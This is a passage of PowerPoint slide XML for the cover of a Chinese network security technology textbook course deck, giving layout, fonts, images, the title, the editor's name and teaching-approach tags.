          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
